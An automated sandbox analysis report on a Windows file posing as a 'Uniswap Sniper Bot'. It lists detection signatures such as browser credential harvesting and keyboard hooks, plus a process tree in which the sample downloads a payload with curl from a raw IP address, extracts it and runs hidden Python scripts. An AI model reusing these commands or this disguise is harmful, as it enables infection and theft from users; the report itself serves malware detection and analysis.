Edit tour
Windows
Analysis Report
Uniswap Sniper Bot With GUI.exe
Overview
General Information
Detection
Score: | 72 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Installs a global keyboard hook
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses known network protocols on non-standard ports
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Drops PE files
Drops certificate files (DER)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a global mouse hook
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- Uniswap Sniper Bot With GUI.exe (PID: 6536 cmdline:
"C:\Users\ user\Deskt op\Uniswap Sniper Bo t With GUI .exe" MD5: EFBC268A345E5A3089CA0640353B98CC) - cmd.exe (PID: 5788 cmdline:
"C:\Window s\system32 \cmd.exe" /c tasklis t /FI "USE RNAME eq % USERNAME%" /FI "IMAG ENAME eq u niswap-sni per-bot-wi th-gui.exe " /FO csv | "C:\Wind ows\system 32\find.ex e" "uniswa p-sniper-b ot-with-gu i.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6284 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 1520 cmdline:
tasklist / FI "USERNA ME eq user " /FI "IMA GENAME eq uniswap-sn iper-bot-w ith-gui.ex e" /FO csv MD5: 0A4448B31CE7F83CB7691A2657F330F1) - find.exe (PID: 6696 cmdline:
"C:\Window s\system32 \find.exe" "uniswap- sniper-bot -with-gui. exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
- uniswap-sniper-bot-with-gui.exe (PID: 6660 cmdline:
"C:\Users\ user\AppDa ta\Local\P rograms\un iswap-snip er-bot-wit h-gui\unis wap-sniper -bot-with- gui.exe" MD5: 7EA968EDE8860D4069D51F9EDEEFB64C) - cmd.exe (PID: 2148 cmdline:
C:\Windows \system32\ cmd.exe /d /s /c "cu rl -Lo "C: \Users\use r\AppData\ Local\Temp \p.zi" "ht tp://185.1 53.182.241 :1224/pdow n"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 1172 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 5880 cmdline:
curl -Lo " C:\Users\u ser\AppDat a\Local\Te mp\p.zi" " http://185 .153.182.2 41:1224/pd own" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1) - uniswap-sniper-bot-with-gui.exe (PID: 6308 cmdline:
"C:\Users\ user\AppDa ta\Local\P rograms\un iswap-snip er-bot-wit h-gui\unis wap-sniper -bot-with- gui.exe" - -type=gpu- process -- user-data- dir="C:\Us ers\user\A ppData\Roa ming\unisw ap-sniper- bot-with-g ui" --gpu- preference s=UAAAAAAA AADgAAAYAA AAAAAAAAAA AAAAAABgAA AAAAAwAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAEgA AAAAAAAASA AAAAAAAAAY AAAAAgAAAB AAAAAAAAAA GAAAAAAAAA AQAAAAAAAA AAAAAAAOAA AAEAAAAAAA AAABAAAADg AAAAgAAAAA AAAACAAAAA AAAAA= --m ojo-platfo rm-channel -handle=16 84 --field -trial-han dle=1904,i ,592099339 6095536571 ,175462931 1965074077 4,131072 - -disable-f eatures=Sp areRendere rForSitePe rProcess,W inRetrieve Suggestion sOnlyOnDem and /prefe tch:2 MD5: 7EA968EDE8860D4069D51F9EDEEFB64C) - explorer.exe (PID: 1028 cmdline:
C:\Windows \Explorer. EXE MD5: 662F4F92FDE3557E86D110526BB578D5) - uniswap-sniper-bot-with-gui.exe (PID: 6508 cmdline:
"C:\Users\ user\AppDa ta\Local\P rograms\un iswap-snip er-bot-wit h-gui\unis wap-sniper -bot-with- gui.exe" - -type=util ity --util ity-sub-ty pe=network .mojom.Net workServic e --lang=e n-GB --ser vice-sandb ox-type=no ne --user- data-dir=" C:\Users\u ser\AppDat a\Roaming\ uniswap-sn iper-bot-w ith-gui" - -mojo-plat form-chann el-handle= 2056 --fie ld-trial-h andle=1904 ,i,5920993 3960955365 71,1754629 3119650740 774,131072 --disable -features= SpareRende rerForSite PerProcess ,WinRetrie veSuggesti onsOnlyOnD emand /pre fetch:8 MD5: 7EA968EDE8860D4069D51F9EDEEFB64C) - uniswap-sniper-bot-with-gui.exe (PID: 6148 cmdline:
"C:\Users\ user\AppDa ta\Local\P rograms\un iswap-snip er-bot-wit h-gui\unis wap-sniper -bot-with- gui.exe" - -type=rend erer --use r-data-dir ="C:\Users \user\AppD ata\Roamin g\uniswap- sniper-bot -with-gui" --app-pat h="C:\User s\user\App Data\Local \Programs\ uniswap-sn iper-bot-w ith-gui\re sources\ap p.asar" -- no-sandbox --no-zygo te --lang= en-GB --de vice-scale -factor=1 --num-rast er-threads =2 --enabl e-main-fra me-before- activation --rendere r-client-i d=4 --laun ch-time-ti cks=654467 2486 --moj o-platform -channel-h andle=2288 --field-t rial-handl e=1904,i,5 9209933960 95536571,1 7546293119 650740774, 131072 --d isable-fea tures=Spar eRendererF orSitePerP rocess,Win RetrieveSu ggestionsO nlyOnDeman d /prefetc h:1 MD5: 7EA968EDE8860D4069D51F9EDEEFB64C) - cmd.exe (PID: 7668 cmdline:
C:\Windows \system32\ cmd.exe /d /s /c "ta r -xf C:\U sers\user\ AppData\Lo cal\Temp\p 2.zip -C C :\Users\us er" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7676 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tar.exe (PID: 7712 cmdline:
tar -xf C: \Users\use r\AppData\ Local\Temp \p2.zip -C C:\Users\ user MD5: 3596DC15B6F6CBBB6EC8B143CBD57F24) - uniswap-sniper-bot-with-gui.exe (PID: 7920 cmdline:
"C:\Users\ user\AppDa ta\Local\P rograms\un iswap-snip er-bot-wit h-gui\unis wap-sniper -bot-with- gui.exe" - -type=gpu- process -- disable-gp u-sandbox --use-gl=d isabled -- gpu-vendor -id=5140 - -gpu-devic e-id=140 - -gpu-sub-s ystem-id=0 --gpu-rev ision=0 -- gpu-driver -version=1 0.0.19041. 546 --user -data-dir= "C:\Users\ user\AppDa ta\Roaming \uniswap-s niper-bot- with-gui" --gpu-pref erences=UA AAAAAAAADo AAAYAAAAAA AAAAAAAAAA AABgAAAAAA AwAAAAAAAA AAAAAACAAA AAAAAAAAAA AAAAAAAAAA AAAEgAAAAA AAAASAAAAA AAAAAYAAAA AgAAABAAAA AAAAAAGAAA AAAAAAAQAA AAAAAAAAAA AAAOAAAAEA AAAAAAAAAB AAAADgAAAA gAAAAAAAAA CAAAAAAAAA A= --mojo- platform-c hannel-han dle=2236 - -field-tri al-handle= 1904,i,592 0993396095 536571,175 4629311965 0740774,13 1072 --dis able-featu res=SpareR endererFor SitePerPro cess,WinRe trieveSugg estionsOnl yOnDemand /prefetch: 2 MD5: 7EA968EDE8860D4069D51F9EDEEFB64C) - cmd.exe (PID: 8112 cmdline:
C:\Windows \system32\ cmd.exe /d /s /c ""C :\Users\us er\.pyp\py thon.exe" "C:\Users\ user/.sysi nfo"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8120 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - python.exe (PID: 8152 cmdline:
"C:\Users\ user\.pyp\ python.exe " "C:\User s\user/.sy sinfo" MD5: C793995B4BE06C17BF4AAE2E1302196B) - cmd.exe (PID: 8184 cmdline:
C:\Windows \system32\ cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - python.exe (PID: 5380 cmdline:
C:\Users\u ser\.pyp\p ython.exe C:\Users\u ser\.n2/pa y MD5: C793995B4BE06C17BF4AAE2E1302196B) - conhost.exe (PID: 5700 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 616 cmdline:
C:\Windows \system32\ cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - python.exe (PID: 4280 cmdline:
C:\Users\u ser\.pyp\p ython.exe C:\Users\u ser\.n2/bo w MD5: C793995B4BE06C17BF4AAE2E1302196B) - conhost.exe (PID: 2668 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 6820 cmdline:
C:\Windows \system32\ cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - powershell.exe (PID: 4304 cmdline:
powershell -Command " $u rl = \"htt ps://www.p ython.org/ ftp/python /3.11.0/py thon-3.11. 0-amd64.ex e\" $filePath = \"C:\Use rs\user\Ap pData\Loca l\Temp\tmp n1hib8nx.e xe\" Invoke-We bRequest - Uri $url - OutFile $f ilePath " MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 4752 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - python.exe (PID: 4336 cmdline:
C:\Users\u ser\.pyp\p ython.exe C:\Users\u ser\.n2/ml ip MD5: C793995B4BE06C17BF4AAE2E1302196B) - conhost.exe (PID: 7264 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - python.exe (PID: 1788 cmdline:
C:\Users\u ser\.pyp\p ython.exe -m pip ins tall wxPyt hon MD5: C793995B4BE06C17BF4AAE2E1302196B) - cmd.exe (PID: 1220 cmdline:
C:\Windows \system32\ cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- cleanup
⊘No configs have been found
⊘No yara matches
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
⊘No Suricata rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | ReversingLabs: |
Source: | Static PE information: |
Source: | Registry value created: | Jump to behavior |
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior |
Source: | HTTPS traffic detected: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Networking |
---|
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | IP Address: |
Source: | JA3 fingerprint: |
Source: | DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: |